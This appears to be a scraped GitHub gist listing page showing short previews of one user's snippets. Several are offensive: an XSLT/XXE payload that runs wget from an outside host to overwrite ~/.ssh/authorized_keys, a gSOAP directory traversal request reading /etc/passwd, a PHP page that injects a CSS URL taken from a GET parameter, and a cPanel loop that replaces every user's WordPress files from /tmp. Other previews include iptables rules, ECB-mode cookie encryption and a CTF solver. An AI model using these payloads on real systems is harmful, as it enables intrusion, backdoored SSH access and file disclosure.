Skip to content

Instantly share code, notes, and snippets.

Avatar
🍪

numan türle numanturle

🍪
View GitHub Profile
View gist:ee0151e68f98e518f3a9b9c00306a3c4
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "file:///home/xxx/.ssh/authorized_keys">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[wget http://xxxx/geldi -O /home/xxx/.ssh/authorized_keys]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
View Turkey Binlist 2020
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
View gist:1726dc0886885ed4f9d2c42c07b5713b
for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done;
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done;
iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP;
ip6tables -A INPUT -p tcp -m multiport --dports http,https -j DROP;
View MCRYPT_RIJNDAEL_256
function encryptCookie($value){
if(!$value){return false;}
$key = APP_KEY;
$text = $value;
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
$crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $text, MCRYPT_MODE_ECB, $iv);
return trim(base64_encode($crypttext)); //encode for cookie
}
View solve
import base64, json, os, random, re, subprocess, time, xml.sax
from io import StringIO
def setup(seed):
global state
state = 0
for i in range(16):
cur = seed & 3
seed >>= 2
state = (state << 4) | ((state & 3) ^ cur)
View gist:f83b4507cf419667f5ae690fe9921710
var yasakli = document.querySelectorAll('[aria-label="XXXXTopluluğu adlı kullanıcının yayınını beğenmekten vazgeç"]');
yasakli.forEach.call(yasakli, function(nesne){
nesne.click();
});
@numanturle
numanturle / code.php
Created Jan 27, 2020
css html via content svg url
View code.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Title of the document</title>
<link href="<?php echo (isset($_GET['css'])?htmlspecialchars($_GET['css']):null); ?>" rel="stylesheet">
</head>
<body>
Content of the document......
</body>
View wp update
for i in $(ls /var/cpanel/users); do if [ -f /home/$i/public_html/wp-load.php ]; then cd /home/$i/public_html/;rm -rf wp-admin;rm -rf wp-includes; cp /tmp/a.zip a.zip;unzip -o a.zip;rm -rf a.zip;chown -R $i:$i *;fi; done
View gSOAP 2.8 Directory Traversal
Request
############################
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
View gist:d7a89f13c70d0ffa9e9b30bb90ccc85f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf8
import urllib.request
import urllib.error
import time
from multiprocessing import Pool
start = time.time()
You can’t perform that action at this time.